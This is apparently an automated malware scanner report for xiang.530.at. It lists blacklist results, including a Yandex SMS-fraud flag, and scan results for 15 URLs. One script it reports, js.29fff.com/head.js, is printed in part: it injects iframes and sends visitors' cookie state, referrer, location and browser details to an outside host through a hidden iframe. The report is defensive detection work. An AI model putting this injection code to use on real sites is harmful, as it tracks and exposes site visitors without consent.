New scan:

Malware Scanner report for xiang.530.at

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Yandex as SMS-fraud resource.

The website "xiang.530.at" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/1/2
1 suspicious iframe found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=xiang.530.at

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://xiang.530.at/

Result: The website is marked by Yandex as SMS-fraud resource. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://xiang.530.at/
200 OK
Content-Length: 15668
Content-Type: text/html
clean
http://js.29fff.com/head.js
200 OK
Content-Length: 1860
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.writeln("<div align=\"center\" style=\"background-color:#FFFFFF;width:100%;\" >");
document.writeln("<iframe src=http://www.61172.com/?do=top MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 frameborder=0 height=2500 width=100%></iframe>");
document.writeln("<\/div>");

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
... 978 bytes are skipped ...
r yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count29.51yes.com/sa.htm?id=297623349'+yesdata+' height=0 width=0></iframe>');

Antivirus reports:

NANO-Antivirus
Trojan.Url.IframeB.rsbhf

Hidden iFrame found.
size: 0x0     
src: http://count29.51yes.com/sa.htm?id=297623349

<iframe marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no src=http://count29.51yes.com/sa.htm?id=297623349'+yesdata+' height=0 width=0>

http://xiang.530.at/post/?tag=133%E6%9C%9F%E7%99%BD%E5%A7%90%E9%80%8F%E7%89%B9
200 OK
Content-Length: 13421
Content-Type: text/html
clean
http://xiang.530.at/a-1621-2.html
200 OK
Content-Length: 14442
Content-Type: text/html
clean
http://xiang.530.at/post/?tag=%E5%86%85%E9%83%A8%E7%89%B9%E7%A0%81%E5%85%AC%E5%BC%8F%E6%9C%BA%E5%AF%86112%E6%9C%9F%E5%85%8D%E8%B4%B9%E5%85%AC%E5%BC%80
200 OK
Content-Length: 13151
Content-Type: text/html
clean
http://xiang.530.at/a-1469-1.html
200 OK
Content-Length: 14411
Content-Type: text/html
clean
http://xiang.530.at/post/?tag=%E9%A6%99%E6%B8%AF%E6%83%A0%E6%B3%BD%E7%A4%BE%E7%BE%A4125%E6%9C%9F%E8%B5%84%E6%96%99
200 OK
Content-Length: 13161
Content-Type: text/html
clean
http://xiang.530.at/a-1980-2.html
200 OK
Content-Length: 14089
Content-Type: text/html
clean
http://xiang.530.at/post/?tag=%E5%BD%A9%E7%A5%A8%E5%8F%8C%E8%89%B2%E7%90%83%E8%B5%B0%E5%8A%BF%E5%9B%BE2012
200 OK
Content-Length: 13311
Content-Type: text/html
clean
http://xiang.530.at/a-1022-1.html
200 OK
Content-Length: 14629
Content-Type: text/html
clean
http://xiang.530.at/post/?tag=%E9%A6%99%E6%B8%AF%E8%B5%9B%E9%A9%AC%E4%BC%9A%E5%AE%98%E6%96%B9%E7%BD%91www.135188.com
200 OK
Content-Length: 13038
Content-Type: text/html
clean
http://xiang.530.at/a-1266-1.html
200 OK
Content-Length: 13853
Content-Type: text/html
clean
http://xiang.530.at/post/?tag=87%E6%9C%9F%E5%85%AD%E5%90%88%E9%87%87
200 OK
Content-Length: 13262
Content-Type: text/html
clean
http://xiang.530.at/a-742-2.html
200 OK
Content-Length: 14988
Content-Type: text/html
clean
http://xiang.530.at/post/?tag=90%E5%90%8E%E7%BE%8E%E5%A5%B3%E4%BA%BA%E4%BD%93%E5%BD%A9%E7%BB%98
200 OK
Content-Length: 12970
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: xiang.530.at

Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Aug 2014 23:42:17 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.3.14
Second query (visit from search engine):
GET / HTTP/1.1
Host: xiang.530.at
Referer: http://www.google.com/search?q=xiang.530.at

Result:
The result is similar to the first query. There are no suspicious redirects found.